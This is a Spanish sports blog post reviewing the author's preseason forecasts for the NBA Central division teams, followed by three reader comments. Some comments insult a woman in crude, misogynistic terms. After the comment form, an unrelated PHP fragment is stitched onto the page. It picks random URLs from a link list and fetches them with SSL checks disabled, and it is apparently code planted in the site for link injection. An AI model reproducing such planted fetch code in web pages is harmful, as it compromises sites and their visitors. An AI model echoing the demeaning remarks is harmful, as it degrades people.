Revisando pronósticos: Central

14 de February de 2014 por TheDeerHunter

CHICAGO BULLS

Pronóstico Septiembre 2013: Por encima de 60 victorias. Primeros en el Este. Finalistas de conferencia… como mínimo.
Probabilidad de acierto: Nula
Calificación pronóstico: D

Antes de que empecéis a hacer sangre, vaya por delante que nos cubrimos explícitamente las espaldas con la cuestión del estado físico en una franquicia con relevantes antecedentes muy recientes.

Los Bulls sin Rose no son candidatos. Nadie en su sano juicio les pondría en 60 victorias y dominando la regular en el Este. Tampoco podíamos poner la mano en el fuego por la salud de un jugador que había estado toda una temporada en blanco y una buena parte de la anterior parado por culpa de las lesiones. Al menos esta vez se trata “sólo” de una rotura de menisco, pero directamente se le ha descartado ya para toda la temporada y a nadie se le ocurre ahora especular con una vuelta temprana.

En este caso resulta apropiado pensar qué hubiera pasado aún con él disponible. Dejando de lado a Miami que volverá a ser el rival a batir en playoffs pase lo que pase, con el crecimiento de Indiana probablemente también podríamos haber errado el pronóstico porque la regular hubiera sido cualquier cosa menos un paseo en barca. A posteriori incluso se antoja que los Blazers, en todo momento, podían haberles mirado a la cara prácticamente en cualquier aspecto, incluido el defensivo. Palabras mayores.

No pudo ser. Aún con todo eran perfectamente capaces de seguir siendo grandes animadores de la conferencia y duro rival en los cruces. Sin embargo se aprovechaba la situación para resolver la salida de Deng (un secreto a voces) y poner a Boozer en la picota. El contexto parece estar cada día más en su contra y se tiene muy presente un, hasta cierto punto, lógico cambio de rumbo. De todas maneras ellos se las arreglan todavía para dar la cara con lo que tienen. Un 50% de victorias que no firman muchos equipos en su conferencia y unas señas de identidad sólidas. La defensa de los Bulls sigue siendo respetada y Thibbodeau consigue sacar petróleo de jugadores como Augustine, Snell o Dunleavy. Poco más se les puede pedir. 

CLEVELAND CAVALIERS

Pronóstico Septiembre 2013: Rondando las 40 victorias y peleando por las últimas plazas de PO.
Probabilidad de acierto: Media-baja
Calificación pronóstico: D

¿Conocéis el mito del Rey Midas? Sí, aquel que todo lo que tocaba lo transformaba en oro. Mike Brown viene a ser parecido, aunque en lugar de oro lo que produce es mier… Bueno, tampoco seamos injustos. Hay que tener en cuenta que si se le fichó, como decía el análisis, teóricamente era para lograr hacer defender a ese joven equipo. El año pasado era el 5º equipo que más puntos recibió en contra y este año es el 6º. Objetivamente se ha notado su trabajo. También en la gestión de sus jóvenes valores, dónde va a parar.

Al César lo que es del César y seguro que Brown no tiene toda la culpa que los Cavaliers sean una de las grandes decepciones del curso (salvo sorpresa… ay si siguiera estando Bynum, igual le veíamos hasta jugar). Todo lo que podía ir mal ha ido mal y nada de factores exógenos, sino de evidentes y variados pecados propios. El primero, eso sí, es que salta a la vista lo mal trabajado que está el equipo. El resto de decisiones estratégicas ya le han costado la cabeza a Chris Grant con todo merecimiento. Enumeremos las 3 mejores “hazañas”, aunque habría muchos más de lo que hablar:

  1. Apostar fuerte por Andrew Bynum a estas alturas es una soberana estupidez y más si encima significa cortar la progresión de Tyler Zeller y limitar minutos a otros interiores. Lo peor es que Brown ya tenía que saber a lo que se enfrentaba. Le deja en muy mal lugar el asunto tanto si se le fichó con su consentimiento (por masoca) o sin él (por pusilánime). La gestión de su salida fue la semilla adecuada para generar los rumores más sórdidos y echar más leña al fuego en el ambiente del vestuario. ¿O acaso creían que aludir a un escueto “conducta inapropiada para el equipo” iba a detener las activas mentes de los internautas?
  2. Kyrie Irving, “el faro que debe llevar a la franquicia a cotas más altas”, se lo ha creído demasiado. La sensación que deja es que sólo juega para él y más para lucirse que para lograr resultados. Esto provoca dos daños colaterales importantes: deja nuevamente en evidencia al técnico, que ya cuenta en su historial con varios antecedentes de estrella que adquiere excesivo poder en sus equipos, y empeora el rendimiento de sus compañeros. No sabemos si será verdad o mentira el otro rumor de que alguno le quiso romper la cara pero sus rostros dicen mucho durante los partidos ante su excesiva individualidad.
  3. Anthony Bennett, también conocido como “El destroza-mocks”. Está en condiciones de pasar a la historia como el peor nº1 del draft. Al menos la gente se entretiene recopilando youtubes con sus jugadas más ridículas. Como siempre en estos casos tampoco se sabe si fue primero el huevo o la gallina porque destrozar su confianza nada más aterrizar tampoco parece una buena idea. Realmente nunca le vimos un rol claro en este equipo y, seguramente por eso, a todo el mundo le sorprendió tanto la elección.

En definitiva, la progresión de los Cavs es de menos de 30 partidos. Sin playoffs y pasando en tiempo récord de ser un equipo atractivo y simpático a lamentables y un poco odiosos. También tiene su mérito.

DETROIT PISTONS

Pronóstico Septiembre 2013: 6º del Este rondando las 45 victorias
Probabilidad de acierto: Media-baja
Calificación pronóstico: D

En parte se barruntaba que no es oro todo lo que reluce. Dos grandes y ambiciosos fichajes, Josh Smith y Brandon Jennings, más una flamante elección 8 del draft. Para sí los quisieran muchos. El problema viene cuando se cuestiona si las incorporaciones cubrían de la mejor forma posible las necesidades del equipo. Esto es, rodear de gente adecuada el que parecía iba a ser el futuro mejor juego interior de la liga. Monroe+Drummond. Bicharracos.

Se comentaba un poco en el análisis. La intención de Dumars y Cheeks es que Smith jugara más de SF que de PF. La cuestión es que puedes tener la mejor intención del mundo pero no creo que quede nadie que piense que Josh Smith puede ser un ‘3’ de 56 millones en 4 años. Con esta configuración ni te rinde él ni te rinde Monroe. Ésta ha sido la realidad hasta ahora y lo peor es que la solución más lógica ante este panorama puede ser soltar a Monroe. Paso atrás.

Después, Jennings. Le conocemos. Su fichaje, al menos parcialmente, sí fue un acierto porque sí le ha venido bien un cambio de aires que estaba pidiendo a gritos. Diría que está dirigiendo mejor que nunca pero la cabra tira al monte y a Jennings lo que le va es el juego dinámico, los ataques poco elaborados y mucho (demasiado) descaro. Además de algún típico “festival de mandarinas” también hemos visto decenas de contraataques lanzados por él con los tres “rinocerontes” a la carrera. Fabulosos y fascinantes sí, pero ¿tan difícil es entender que cuando tienes una configuración de equipo pesada hay que ralentizar el juego en tu beneficio? Es el más puro ABC del baloncesto y del sentido común. No es casualidad que con el gigantesco frontcourt que poseen los Pistons, más el excelente defensor que está demostrando ser Caldwell-Pope sean de los que más puntos encajan del campeonato. El ritmo de juego no les favorece en ningún caso.

La tercera pata a comentar es precisamente el rookie. No hay mucho que reprocharle, se gana su puesto de titular con defensa y esfuerzo lo que no ha logrado demostrar ofensivamente. ¡Y lo vendíamos en el análisis como un “gran tirador”! Efectivamente así era considerado pero no ha logrado adaptar su juego a esta liga. El problema es que se dejó pasar a Carter-Williams o Burke. A toro pasado decisión poco adecuada, nuevamente.

Definitivamente 45 victorias son esencialmente inalcanzables, pero no los playoffs. John Loyer, al menos, ha comenzado con buen pie.

INDIANA PACERS

Pronóstico Septiembre 2013: 56 victorias y 26 derrotas. Finalistas del Este cayendo 4-3 con los Heat pero nuevamente por poquito.
Probabilidad de acierto: Media-alta
Calificación pronóstico: B

Lo comentamos en el análisis. Frente al conservadurismo clásico de la cuna de baloncesto, los Pacers por fin habían demostrado ambición para formar un señor equipo. Este año sí son aspirantes al que sería su primer anillo. “El cinco inicial es conocido de memoria, sumado a esta renovada y excelente banca” decíamos. Aún no habíamos visto la extraordinaria evolución de Stephenson, como tampoco el fichaje por el mínimo de veteranos de Andrew Bynum. Esperemos que al menos no estorbe mucho. En aquel debate de mejores y más profundas plantillas que tuvimos a principio de curso ellos debieron ocupar alguna esquina del cuadrilátero.

El equipo ha funcionado como un reloj, especialmente en defensa. Son los mejores de largo en ese apartado y también firman el mejor diferencial del campeonato. No en vano vienen encabezando la clasificación prácticamente todo el curso. Teniendo en cuenta lo intratables que se han mostrado en Indianapolis asegurar la ventaja de campo podría significar un factor clave.

Vogel ha dado con la tecla. A pesar de tener en el equipo a un jugador con un talento relativamente cercano a LeBron o Durant (hablamos de Paul George), ha logrado que el equipo sea muy independiente respecto a su figura. Hemos visto sacar las castañas del fuego a prácticamente casi todos. Hill, West, Hibbert, Stephenson, Watson… Quizá el único pero podría ser que no estamos viendo en Granger el candidato a mejor 6º hombre que muchos esperarían que fuera. La parte positiva de ello es que el hombre al menos trata de sumar sin forzar tensiones en el vestuario. Muchos tampoco aguantarían con tanta dignidad y profesionalidad la situación.

Frente a otros “Juggernauts” de la liga, llamémosles Miami u Oklahoma, Indiana se presenta como una potencia coral. El equipo ha mejorado en todo, especialmente en la banca, respecto a los que de milagro no eliminaron a los vigentes campeones las pasadas eliminatorias y ahora estos últimos parecen más asequibles que nunca. Es lógico mantener la condición de favoritos a los que indudablemente se lo han ganado los últimos años pero éste parece ser el rival más fuerte al que nunca se han enfrentado. De ahí que sea posible que nos hayamos quedado cortos en nuestras previsiones. Sólo el tiempo puede decirlo.

MILWAUKEE BUCKS

Pronóstico Septiembre 2013: 30 victorias con dificultad. Últimos de la Central.
Probabilidad de acierto: Imposible por un lado y total por otro.
Calificación pronóstico: B-

Si en algo fallamos en nuestro análisis es en otorgarles un crédito que no merecen. Los Bucks han tenido la inmensa suerte de “competir” en el débil Este porque de otra forma estaríamos hablando de claros candidatos al peor equipo de la historia. En estos momentos suman una única victoria frente a rivales del Oeste.

No empezó muy bien el asunto. Larry Sanders, “lo más parecido que tienen a jugador franquicia” (madre mía, yo firmé eso) decidió marcarse uno de los mejores “bailoteos” en una pista de baile que hayamos visto tras Travolta en “Saturday night fever”. Empezó el curso lesionado y totalmente devaluado. A partir de ese mítico momento no podemos decir que la cosa fuera a peor, porque es imposible, pero seguro que fue menos divertida. “Equipo austero y cumplidor” decíamos. Qué chistosos. Nadie esperaba gran cosa de ellos, pero es que ni eso.

Exceptuando a Sanders (44 kilos en los próximos 4 años) no sabría decidir cual es la peor calamidad en el panorama actual de la franquicia. Ni siquiera me atrevo a hacer un top 3 de meteduras de pata como con los Cavaliers. Hay tantas y tan vergonzosas que terminamos antes señalando lo mínimo rescatable.

La caída en desgracia del teórico juego interior titular de Bucks, junto a la tendencia de Pachulia de tirarse meses lesionado ha permitido descubrir dos piezas aprovechables. Tanto John Henson como Khris Middleton están cumpliendo dignamente y ganándose su sueldo. A años luz de lo que podríamos decir de la mayoría de sus compañeros (Mayo + Butler + Ersan + Sanders + Udoh = casi 35 millones de dólares. Escalofriante).

Aunque no empezó fino la campaña Brandon Knight sí ha logrado suplir, al menos en parte, la ausencia de Jennings. No se me ocurren muchas alternativas mejores para lidiar con una situación como ésta. Un base sobrio y de perfil “humilde” es precisamente lo que necesitan. Me atrevería a decir que sus cifras de asistencias están sesgadas por la panda de patanes a los que debe regalar los pases.

El último acierto, bajo nuestro punto de vista, es el rookie griego Giannis Antetokounmpo. Ya dijimos de él que había dejado muy buen sabor de boca en la pretemporada y después le hemos llegado a incluso nombrar como nº1 de nuestro draft 2013 redux por potencial. Si no decide huir de allí en cuanto tenga la oportunidad y no termina dándose a las drogas por pura desesperación pueden tener jugador para rato.

Comenta

3 comentarios a esta entrada

  1. Denise dice:
    #1

    Muy bueno estos post-analisis para ver la de cagadas que acabamos diciendo.
    En los Bucks, no aparece reflejado y yo destacaría también el rendimiento de Wolters, nada malo para ser un pick 38 de uno de los supuestos peores Drafts de los últimos años. Como dije hace tiempo, una parte de la solución para ellos es hacerse con Pau a cambio de quitarse contratos basura, Sanders+Ilyasova; Mayo`+ Ilyasova, Pachulia+Sanders..por falta de combinaciones no será. Lo suyo sería reconstruir con Henson, Antetokoumpo y su proximo Top 4 del Draft. Aunque ultimamente suena un gran interés de los ciervos por Eric Gordon.
    Hablando de ciervos..tu nick a que es debido Deer, una mención a los Bucks, la pelicula esa de los años 80, el grupo de rock indie, ó cualquier cosa que te pasó por la azotea..

    Respecto a lo Pistons y los Cavaliers, disculpo a quien hiciera los análisis, yo creo que sus pobres rendimientos eran totalmente insospechados y casi todos los dabamos como seguros equipos de PO, porque plantillas tienen. La noticia del vinculo de los Cavs sobre esa actriz porno, ja que tia mas patética y creída, habla como si ella fuese una diosa irresistible y no vale ni para caldo de puchero. Seguro que Irving, Waiters y cia no pueden acostarse con tias mas buenas y menos usadas que ella..en fin.

    Lo de Pacers y Bulls totalmente lo esperado, aunque los toros lo están haciendo mucho mejor sin Deng de lo que pensaba. Respecto a Rose, lo mejor para ellos sería que se recuperase y en cuanto encadenase un par de buenos partidos, lacito y para otro equipo, ese hombre ya puede volver a romperse en cualquier momento y va a jugar con mucho miedo.

      Citar

  2. TheDeerHunter dice:
    #2

    Si los Lakers buscan traspasar a Pau es precisamente para ahorrarse su contrato. No creo que estén de ninguna manera dispuestos a asumir otros contratos.
    Sobre mi nick, nada que ver con los Bucks. Parte referencia a la obra maestra de Cimino y otra parte producto de otras cosas que se me pasaron por la azotea.

    Y sobre la tipa esa no se porqué me imaginaba que ibas a comentar algo así. Te equivocas. Será todo lo creída y patética que quieras… pero obviamente busca notoriedad. En parte, como queda demostrado, la ha conseguido.

      Citar

  3. Denise dice:
    #3

    TheDeerHunter:
    Si los Lakers buscan traspasar a Pau es precisamente para ahorrarse su contrato. No creo que estén de ninguna manera dispuestos a asumir otros contratos.
    Sobre mi nick, nada que ver con los Bucks. Parte referencia a la obra maestra de Cimino y otra parte producto de otras cosas que se me pasaron por la azotea.

    Y sobre la tipa esa no se porqué me imaginaba que ibas a comentar algo así. Te equivocas. Será todo lo creída y patética que quieras… pero obviamente busca notoriedad. En parte, como queda demostrado, la ha conseguido.

    Está claro que quieren rebajar salarios, pero si por el camino le sale por ejemplo a Sanders ú otro jugador interesante, pues ya tienen un center para el futuro. Que Sanders en algún momento tendrá que demostrar algo de lo que hizo el año pasado, digo yo..

    Es que el reto para motivarlos debería ser me acuesto con ellos si no se clasifican para playoffs porque vaya truño de tia. Ascazo de mujer en todos los sentidos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>